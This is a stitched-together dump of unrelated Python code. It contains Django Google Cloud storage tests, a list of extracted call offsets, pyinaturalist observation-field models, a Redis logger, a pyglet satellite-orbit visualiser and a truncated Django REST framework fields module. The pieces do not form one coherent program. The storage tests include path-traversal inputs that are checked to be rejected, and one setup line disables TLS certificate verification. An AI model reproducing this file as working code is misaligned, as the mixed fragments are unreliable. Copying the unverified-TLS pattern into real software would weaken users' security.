assert f._tmpfile._rolled
def test_modified_files_should_be_marked_as_dirty(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None)
f.write(self.TEST_CONTENT)
assert f._dirty
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestGCloudStorageClass:
TEST_FILE_NAME = "test_file_" + get_random_string(6)
TEST_FILE_NAME_UNICODE = "test_file_陰陽_" + get_random_string(6)
TEST_FILE_CONTENT = "Brathähnchen".encode("utf8")
def upload_test_file(self, storage, name, content):
if six.PY3 and isinstance(content, str):
content = content.encode("utf8")
with TemporaryFile() as testfile:
testfile.write(content)
testfile.seek(0)
storage.save(name, testfile)
def test_should_create_blob_at_correct_path(self, storage):
with TemporaryFile() as testfile:
testfile.write(self.TEST_FILE_CONTENT)
testfile.seek(0)
storage_path = storage.save(self.TEST_FILE_NAME, testfile)
assert storage_path == self.TEST_FILE_NAME
def test_should_create_a_valid_client_object(self, storage):
with pytest.raises(gcloud.exceptions.NotFound):
storage.client.get_bucket("some_random_bucket_name_that_doesnt_exist")
def test_should_create_a_valid_bucket_object(self, storage):
assert storage.bucket.exists()
def test_should_be_able_to_save_and_open_files(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
f = storage.open(self.TEST_FILE_NAME)
assert f.read() == self.TEST_FILE_CONTENT
def test_should_return_created_time(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert isinstance(storage.created_time(self.TEST_FILE_NAME), datetime.datetime)
def test_should_return_modified_time(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert isinstance(storage.modified_time(self.TEST_FILE_NAME), datetime.datetime)
def test_should_be_able_to_delete_files(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
storage.delete(self.TEST_FILE_NAME)
# Should not raise an exception by gcloud
assert storage.delete("missing_file") is None
def test_exists_method(self, storage):
assert not storage.exists(self.TEST_FILE_NAME)
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert storage.exists(self.TEST_FILE_NAME)
def test_should_return_correct_file_size(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert storage.size(self.TEST_FILE_NAME) == len(self.TEST_FILE_CONTENT)
def test_should_return_publicly_downloadable_url(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert urlopen(storage.url(self.TEST_FILE_NAME)).read() == self.TEST_FILE_CONTENT
def test_should_work_with_utf8(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
storage.exists(self.TEST_FILE_NAME_UNICODE)
# Don't explode when trying to find a available name for existing files...
self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
def test_should_be_able_to_list_dirs_and_files(self, storage):
subdir_file_pattern = "/subdir/%s.%d"
for i in range(1, 11):
self.upload_test_file(storage, subdir_file_pattern % (self.TEST_FILE_NAME, i), "")
self.upload_test_file(storage, "/subdir/a/" + self.TEST_FILE_NAME, "")
self.upload_test_file(storage, "/subdir/b/" + self.TEST_FILE_NAME, "")
# Make sure paths prefixed with a slash are normalized
assert storage.listdir("") == storage.listdir("/")
assert storage.listdir("subdir") == storage.listdir("/subdir")
root_list_dir = storage.listdir("")
assert len(root_list_dir[0]) == 1 and len(root_list_dir[1]) == 0
assert root_list_dir[0] == ["subdir"]
subdir_list_dir = storage.listdir("subdir/")
assert len(subdir_list_dir[0]) == 2 and len(subdir_list_dir[1]) == 10
assert subdir_list_dir[0] == ["a", "b"]
assert subdir_list_dir[1][0] == "%s.%d" % (self.TEST_FILE_NAME, 1)
def test_should_not_overwrite_files_on_save(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, "")
self.upload_test_file(storage, self.TEST_FILE_NAME, "")
assert len(storage.listdir("")[1]) == 2
def test_changed_files_should_be_reuploaded(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, "")
first_modified_time = storage.modified_time(self.TEST_FILE_NAME)
local_tmpfile = storage.open(self.TEST_FILE_NAME)
assert local_tmpfile.read() == "".encode("ascii")
local_tmpfile.seek(0)
local_tmpfile.write(self.TEST_FILE_CONTENT)
local_tmpfile.close()
assert storage.open(self.TEST_FILE_NAME).read() == self.TEST_FILE_CONTENT
assert storage.modified_time(self.TEST_FILE_NAME) != first_modified_time
|
[
"django_gcloud_storage.prepare_name",
"django_gcloud_storage.remove_prefix",
"django_gcloud_storage.safe_join",
"tempfile.TemporaryFile",
"pytest.raises",
"django_gcloud_storage.GCloudFile",
"django.utils.crypto.get_random_string",
"ssl._create_unverified_context",
"urllib2.urlopen"
] |
[((719, 743), 'urllib2.urlopen', 'urlopen', (['*args'], {}), '(*args, **kwargs)\n', (726, 743), False, 'from urllib2 import urlopen\n'), ((625, 657), 'ssl._create_unverified_context', 'ssl._create_unverified_context', ([], {}), '()\n', (655, 657), False, 'import ssl\n'), ((2996, 3027), 'django_gcloud_storage.remove_prefix', 'remove_prefix', (['"""/a/b/c/"""', '"""/a/"""'], {}), "('/a/b/c/', '/a/')\n", (3009, 3027), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((3049, 3080), 'django_gcloud_storage.remove_prefix', 'remove_prefix', (['"""/a/b/c/"""', '"""/b/"""'], {}), "('/a/b/c/', '/b/')\n", (3062, 3080), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((3366, 3382), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {}), '(None)\n', (3376, 3382), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((3726, 3756), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {'maxsize': '(1000)'}), '(None, maxsize=1000)\n', (3736, 3756), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4008, 4038), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {'maxsize': '(1000)'}), '(None, maxsize=1000)\n', (4018, 4038), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4275, 4291), 'django_gcloud_storage.GCloudFile', 'GCloudFile', (['None'], {}), '(None)\n', (4285, 4291), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4472, 4492), 'django.utils.crypto.get_random_string', 'get_random_string', (['(6)'], {}), '(6)\n', (4489, 4492), False, 'from django.utils.crypto import get_random_string\n'), ((4544, 4564), 'django.utils.crypto.get_random_string', 'get_random_string', (['(6)'], {}), '(6)\n', (4561, 4564), False, 'from django.utils.crypto import get_random_string\n'), ((1003, 1026), 'django_gcloud_storage.prepare_name', 'prepare_name', (['blob.name'], {}), '(blob.name)\n', (1015, 1026), False, 'from django_gcloud_storage import prepare_name\n'), ((1181, 1212), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""index.html"""'], {}), "('test', 'index.html')\n", (1190, 1212), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1304, 1336), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test/"""', '"""index.html"""'], {}), "('test/', 'index.html')\n", (1313, 1336), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1373, 1407), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test///"""', '"""index.html"""'], {}), "('test///', 'index.html')\n", (1382, 1407), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1506, 1538), 'django_gcloud_storage.safe_join', 'safe_join', (['"""/test"""', '"""index.html"""'], {}), "('/test', 'index.html')\n", (1515, 1538), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1575, 1610), 'django_gcloud_storage.safe_join', 'safe_join', (['"""////test"""', '"""index.html"""'], {}), "('////test', 'index.html')\n", (1584, 1610), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1705, 1745), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""/test/../index.html"""'], {}), "('test', '/test/../index.html')\n", (1714, 1745), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1835, 1880), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""/test//abc////index.html"""'], {}), "('test', '/test//abc////index.html')\n", (1844, 1880), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((1926, 1976), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test///"""', '"""///test//abc////index.html"""'], {}), "('test///', '///test//abc////index.html')\n", (1935, 1976), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2077, 2115), 'pytest.raises', 'pytest.raises', (['SuspiciousFileOperation'], {}), '(SuspiciousFileOperation)\n', (2090, 2115), False, 'import pytest\n'), ((2129, 2163), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""../index.html"""'], {}), "('test', '../index.html')\n", (2138, 2163), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2177, 2215), 'pytest.raises', 'pytest.raises', (['SuspiciousFileOperation'], {}), '(SuspiciousFileOperation)\n', (2190, 2215), False, 'import pytest\n'), ((2229, 2264), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""/../index.html"""'], {}), "('test', '/../index.html')\n", (2238, 2264), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2324, 2356), 'django_gcloud_storage.safe_join', 'safe_join', (["b'test'", '"""index.html"""'], {}), "(b'test', 'index.html')\n", (2333, 2356), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2393, 2425), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', "b'index.html'"], {}), "('test', b'index.html')\n", (2402, 2425), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2462, 2495), 'django_gcloud_storage.safe_join', 'safe_join', (["b'test'", "b'index.html'"], {}), "(b'test', b'index.html')\n", (2471, 2495), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2589, 2627), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""brathähnchen.html"""'], {}), "('test', 'brathähnchen.html')\n", (2598, 2627), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2734, 2771), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""windows\\\\slashes"""'], {}), "('test', 'windows\\\\slashes')\n", (2743, 2771), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2813, 2851), 'django_gcloud_storage.safe_join', 'safe_join', (['"""test"""', '"""windows\\\\/slashes"""'], {}), "('test', 'windows\\\\/slashes')\n", (2822, 2851), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((2893, 2926), 'django_gcloud_storage.safe_join', 'safe_join', (['"""windows\\\\"""', '"""slashes"""'], {}), "('windows\\\\', 'slashes')\n", (2902, 2926), False, 'from django_gcloud_storage import safe_join, remove_prefix, GCloudFile\n'), ((4780, 4795), 'tempfile.TemporaryFile', 'TemporaryFile', ([], {}), '()\n', (4793, 4795), False, 'from tempfile import TemporaryFile\n'), ((4993, 5008), 'tempfile.TemporaryFile', 'TemporaryFile', ([], {}), '()\n', (5006, 5008), False, 'from tempfile import TemporaryFile\n'), ((5303, 5344), 'pytest.raises', 'pytest.raises', (['gcloud.exceptions.NotFound'], {}), '(gcloud.exceptions.NotFound)\n', (5316, 5344), False, 'import pytest\n')]
|
from datetime import date, datetime
from typing import List, Union
from pyinaturalist.constants import TableRow
from pyinaturalist.converters import safe_split, try_int_or_float
from pyinaturalist.models import (
BaseModel,
LazyProperty,
Taxon,
User,
datetime_now_field,
define_model,
field,
)
# Mappings from observation field value datatypes to python datatypes
OFV_DATATYPES = {
'dna': str,
'date': date,
'datetime': datetime,
'numeric': try_int_or_float,
'taxon': int,
'text': str,
'time': str,
}
OFVValue = Union[date, datetime, float, int, str]
@define_model
class ObservationField(BaseModel):
""":fa:`tag` An observation field **definition**, based on the schema of
`GET /observation_fields <https://www.inaturalist.org/pages/api+reference#get-observation_fields>`_.
"""
allowed_values: List[str] = field(converter=safe_split, factory=list)
created_at: datetime = datetime_now_field(doc='Date and time the observation field was created')
datatype: str = field(default=None) # Enum
description: str = field(default=None)
name: str = field(default=None)
updated_at: datetime = datetime_now_field(
doc='Date and time the observation field was last updated'
)
user_id: int = field(default=None)
users_count: int = field(default=None)
uuid: str = field(default=None)
values_count: int = field(default=None)
@property
def row(self) -> TableRow:
return {
'ID': self.id,
'Type': self.datatype,
'Name': self.name,
'Description': self.description,
}
def __str__(self) -> str:
description = ': {self.description}' if self.description else ''
return f'[{self.id}] {self.name} ({self.datatype}){description}'
@define_model
class ObservationFieldValue(BaseModel):
""":fa:`tag` An observation field **value**, based on the schema of ``Observation.ofvs``
from `GET /observations <https://api.inaturalist.org/v1/docs/#!/Observations/get_observations>`_.
"""
datatype: str = field(default=None) # Enum
field_id: int = field(default=None)
name: str = field(default=None)
taxon_id: int = field(default=None)
user_id: int = field(default=None)
uuid: str = field(default=None)
value: OFVValue = field(default=None)
taxon: property = LazyProperty(
Taxon.from_json, type=Taxon, doc='Taxon that the observation field applies to'
)
user: property = LazyProperty(
User.from_json, type=User, doc='User that applied the observation field value'
)
# Unused attrbiutes
# name_ci: str = field(default=None)
# value_ci: int = field(default=None)
# Convert value by datatype
def __attrs_post_init__(self):
if self.datatype in OFV_DATATYPES and self.value is not None:
converter = OFV_DATATYPES[self.datatype]
self.value = converter(self.value)
@property
def row(self) -> TableRow:
return {
'ID': self.id,
'Type': self.datatype,
'Name': self.name,
'Value': self.value,
}
def __str__(self) -> str:
return f'{self.name}: {self.value}'
|
[
"pyinaturalist.models.LazyProperty",
"pyinaturalist.models.field",
"pyinaturalist.models.datetime_now_field"
] |
[((883, 924), 'pyinaturalist.models.field', 'field', ([], {'converter': 'safe_split', 'factory': 'list'}), '(converter=safe_split, factory=list)\n', (888, 924), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((952, 1025), 'pyinaturalist.models.datetime_now_field', 'datetime_now_field', ([], {'doc': '"""Date and time the observation field was created"""'}), "(doc='Date and time the observation field was created')\n", (970, 1025), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1046, 1065), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1051, 1065), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1097, 1116), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1102, 1116), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1133, 1152), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1138, 1152), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1180, 1258), 'pyinaturalist.models.datetime_now_field', 'datetime_now_field', ([], {'doc': '"""Date and time the observation field was last updated"""'}), "(doc='Date and time the observation field was last updated')\n", (1198, 1258), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1292, 1311), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1297, 1311), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1335, 1354), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1340, 1354), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1371, 1390), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1376, 1390), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1415, 1434), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1420, 1434), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2103, 2122), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2108, 2122), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2151, 2170), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2156, 2170), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2187, 2206), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2192, 2206), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2227, 2246), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2232, 2246), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2266, 2285), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2271, 2285), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2302, 2321), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2307, 2321), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2344, 2363), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2349, 2363), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2386, 2483), 'pyinaturalist.models.LazyProperty', 'LazyProperty', (['Taxon.from_json'], {'type': 'Taxon', 'doc': '"""Taxon that the observation field applies to"""'}), "(Taxon.from_json, type=Taxon, doc=\n 'Taxon that the observation field applies to')\n", (2398, 2483), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2514, 2611), 'pyinaturalist.models.LazyProperty', 'LazyProperty', (['User.from_json'], {'type': 'User', 'doc': '"""User that applied the observation field value"""'}), "(User.from_json, type=User, doc=\n 'User that applied the observation field value')\n", (2526, 2611), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n')]
|
import redis
class ClueLogger:
def __init__(self, block, model):
self.block = block
self.r = redis.StrictRedis('redis')
def out(self, model, value):
self.r.xadd(self.block, {'model': model, 'value': value})
|
[
"redis.StrictRedis"
] |
[((115, 141), 'redis.StrictRedis', 'redis.StrictRedis', (['"""redis"""'], {}), "('redis')\n", (132, 141), False, 'import redis\n')]
|
# Homework for UB DMS 423 - Fall 14
# by <NAME>
#
# Real-time Satellite Visualization
# Input Data type: TLS(Two-line element set)
# Can be found at http://www.celestrak.com/NORAD/elements/
#
# How to control:
# Click a satellite to display its orbit.
# Press H to show/hide all orbits on-screen.
# Press UP/DOWN to change satellite category.
# Press LEFT/RIGHT to adjust orbit interval for line drawing.
#
import ephem, datetime, math, urllib.request, urllib.parse, urllib.error
from pyglet.gl import *
resource = [["GlobalStar", "globalstar"]]
window = pyglet.window.Window(1024,576)
total = 50
interval = 20
batch = pyglet.graphics.Batch()
class Background:
def __init__(self, x,y, xoffset,yoffset, texturefile):
self.texture = pyglet.image.load(texturefile).get_texture()
self.vlist = pyglet.graphics.vertex_list(4, ('v2f', [xoffset,yoffset, xoffset+x,yoffset, xoffset,yoffset+y, xoffset+x,yoffset+y]), ('t2f', [0,0, 1,0, 0,1, 1,1]))
def draw(self):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glColor3f(1,1,1)
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D, self.texture.id)
glPushMatrix()
self.vlist.draw(GL_TRIANGLE_STRIP)
glPopMatrix()
glBindTexture(GL_TEXTURE_2D, 0)
glDisable(GL_TEXTURE_2D)
glDisable(GL_BLEND)
class Satellite:
def __init__(self, name, l1, l2, yoffset):
self.e = ephem.readtle("GS", l1, l2)
self.vlist = pyglet.graphics.vertex_list(4, ("v2f",[-1,1, -1,-1, 1,-1, 1,1]))
self.circle = pyglet.shapes.Circle(0, 0, 1, color=(245,120,76), batch=batch)
self.size = 3
self.showline = 0
self.yoffset = yoffset
def compute(self):
self.e.compute(datetime.datetime.utcnow())
self.long = math.degrees(float(self.e.sublong))
self.lat = math.degrees(float(self.e.sublat))
self.x = (self.long * 128/45) + 512
self.y = (self.lat * 128/45) + 256 + self.yoffset
self.label = pyglet.text.Label(self.e.name, x=7,y=0, anchor_y="center", color=(255,255,255,255))
def draw(self):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glColor4f(1,0,0,1)
self.circle.opacity = 255
glPushMatrix()
glTranslatef(self.x, self.y, 0)
glRotatef(30, 0, 0, 1)
self.label.draw()
glScalef(self.size, self.size, self.size)
#self.vlist.draw(GL_TRIANGLE_FAN)
self.circle.draw()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
glDisable(GL_BLEND)
def draw_alpha(self):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
#glColor4f(.2,.7,.2,.5)
self.circle.opacity = 50
glPushMatrix()
glTranslatef(self.x, self.y, 0)
glRotatef(0, 0, 0, 0)
self.label.draw()
glScalef(40, 40, 40)
#self.vlist.draw(GL_TRIANGLE_FAN)
self.circle.draw()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
glDisable(GL_BLEND)
def draw_line(self):
self.init_line()
glEnable(GL_BLEND)
glColor4f(.7,.7,.7,self.showline)
glPushMatrix()
for x in self.vline_list:
x.draw(GL_LINE_STRIP)
glPopMatrix()
glDisable(GL_BLEND)
def init_line(self):
self.lines, self.vline_list, current_line = [], [], []
for x in range(-total,total):
temp = datetime.datetime.utcnow() + datetime.timedelta(seconds=interval*x)
self.e.compute(temp)
x = (math.degrees(float(self.e.sublong)) * 128/45) + 512
y = (math.degrees(float(self.e.sublat)) * 128/45) + 256 + self.yoffset
if len(current_line) > 1:
# TO AVOID LINE FROM LEFT TO RIGHT
temp_x, temp_y = current_line[-2], current_line[-1]
if temp_x - x > 600:
# From right edge to left edge
current_line.extend((x+1024,y))
self.lines.append(current_line)
current_line = []
current_line.extend((temp_x-1024,temp_y))
elif temp_x - x < -600:
# From left edge to right edge
current_line.extend((x-1024,y))
self.lines.append(current_line)
current_line = []
current_line.extend((temp_x+1024,temp_y))
current_line.extend((x,y))
self.lines.append(current_line)
for x in self.lines:
self.vline_list.append(pyglet.graphics.vertex_list(int(len(x)/2), ("v2f", x)))
def init():
global background_map, background_banner, category_num
global text_current_set, text_current_time, text_infos, text_infos_2, text_infos_3
open_new_file(0)
category_num = 0
#background_map = Background(1024,512,0,64,"assets/blue.jpg")
#background_map = Background(1024,512,0,64,"assets/bluer.jpg")
background_map = Background(1024,512,0,64,"assets/map2_4096.png")
#background_banner = Background(1024,128,0,0,"assets/bg.png")
text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
text_infos = pyglet.text.Label("Click a satellite to display its orbit, Press H to show/hide all orbits on-screen.", x=460, y=50, anchor_y="center", color=(255,255,255,200))
text_infos_2 = pyglet.text.Label("Press UP/DOWN to change satellite category.", x=460, y=32, anchor_y="center", color=(255,255,255,200))
text_infos_3 = pyglet.text.Label("Press LEFT/RIGHT to adjust orbit interval for line drawing.", x=460, y=14, anchor_y="center", color=(255,255,255,200))
@window.event
def on_draw():
glClear(GL_COLOR_BUFFER_BIT)
background_map.draw()
#background_banner.draw()
text_current_set.draw()
text_current_time.draw()
text_infos.draw()
text_infos_2.draw()
text_infos_3.draw()
for x in sats:
x.draw()
x.draw_alpha()
x.draw_line()
def update(dt):
global text_current_time, text_current_set
text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
for x in sats:
x.compute()
def distance(a, b):
return (a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2
def open_new_file(num):
global source, lines, sats, show_all_line
# source = open("data/"+resource[num][1] + ".txt")
# Uncomment following lines for online access
name = resource[num][1]
url = "http://www.celestrak.com/NORAD/elements/" + name +".txt"
source = urllib.request.urlopen(url).readlines()
lines = [line.decode("utf-8").replace("\r\n", "") for line in source]
sats = []
show_all_line = 0
for x in range(int(len(lines) / 3)):
e = Satellite(lines[x * 3], lines[x * 3 + 1], lines[x * 3 + 2], 64)
e.compute()
sats.append(e)
@window.event
def on_mouse_press(x,y, dx,dy):
global show_all_line
show_all_line = 0
refresh_all_line([None])
for o in sats:
if distance((o.x,o.y), (x,y)) <= o.size ** 2:
o.showline = int(not o.showline)
refresh_all_line([o])
def refresh_all_line(withouts):
for o in sats:
for w in withouts:
if o!= w:
o.showline = show_all_line
@window.event
def on_key_press(symbol, modifiers):
global show_all_line, category_num, interval
if symbol == pyglet.window.key.H:
show_all_line = not show_all_line
refresh_all_line([None])
elif symbol == pyglet.window.key.UP:
category_num += 1
if category_num == len(resource):
category_num = 0
open_new_file(category_num)
update(0)
elif symbol == pyglet.window.key.DOWN:
category_num -= 1
if category_num == -1:
category_num = len(resource)-1
open_new_file(category_num)
update(0)
elif symbol == pyglet.window.key.LEFT:
interval -= 20
if interval < 10:
interval = 10
elif symbol == pyglet.window.key.RIGHT:
interval += 20
if interval > 500:
interval = 500
init()
pyglet.clock.schedule_interval(update, 1/1.0)
pyglet.app.run()
|
[
"ephem.readtle",
"datetime.timedelta",
"datetime.datetime.utcnow"
] |
[((1373, 1400), 'ephem.readtle', 'ephem.readtle', (['"""GS"""', 'l1', 'l2'], {}), "('GS', l1, l2)\n", (1386, 1400), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((1671, 1697), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (1695, 1697), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((3115, 3141), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3139, 3141), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((3144, 3184), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(interval * x)'}), '(seconds=interval * x)\n', (3162, 3184), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((4704, 4730), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4728, 4730), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((5699, 5725), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (5723, 5725), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n')]
|
from collections import OrderedDict
from django.utils.translation import gettext_lazy as _
from model_utils import Choices
from rest_framework import serializers
from rest_framework.fields import empty, Field, SkipField
from rest_framework.utils import model_meta
from rest_framework_recursive.fields import RecursiveField
from unicef_restlib.utils import get_attribute_smart
class builtin_field:
pass
class ModelChoiceField(serializers.PrimaryKeyRelatedField):
default_error_messages = {
'does_not_exist': _('Invalid option "{pk_value}" - option is not available.'),
}
@property
def choices(self):
if hasattr(self._choices, '__call__'):
self._choices = self._choices()
return self._choices
def get_choice(self, obj):
raise NotImplementedError
def _choices(self):
return OrderedDict(map(self.get_choice, self.get_queryset()))
class SeparatedReadWriteField(Field):
read_field = None
write_field = None
def __init__(self, read_field, write_field=builtin_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read_field = read_field
self.write_field = write_field
# update fields from kwargs
for kwarg_name in {'label', } & set(kwargs.keys()):
setattr(self.read_field, kwarg_name, kwargs[kwarg_name])
if self.write_field is not builtin_field:
setattr(self.write_field, kwarg_name, kwargs[kwarg_name])
def to_representation(self, value):
return self.read_field.to_representation(value)
def to_internal_value(self, data):
return self.write_field.to_internal_value(data)
def get_validators(self):
return self.write_field.get_validators()
def validate_empty_values(self, data):
"""
Validate empty values, and either:
* Raise `ValidationError`, indicating invalid data.
* Raise `SkipField`, indicating that the field should be ignored.
* Return (True, data), indicating an empty value that should be
returned without any further validation being applied.
* Return (False, data), indicating a non-empty value, that should
have validation applied as normal.
"""
if data is empty:
if getattr(self.root, 'partial', False):
raise SkipField()
if self.write_field.required:
self.fail('required')
return (True, self.get_default())
if data is None:
if not self.write_field.allow_null:
self.fail('null')
return (True, None)
return (False, data)
def _build_field(self):
model = getattr(self.parent.Meta, 'model')
depth = getattr(self.parent.Meta, 'depth', 0)
info = model_meta.get_field_info(model)
# Determine any extra field arguments and hidden fields that
# should be included
extra_kwargs = self.parent.get_extra_kwargs()
extra_kwargs.update(self._kwargs)
extra_kwargs, hidden_fields = self.parent.get_uniqueness_extra_kwargs(
[self.field_name], [self], extra_kwargs
)
extra_field_kwargs = {
key: value for key, value in self._kwargs.items()
if key not in ['read_field']
}
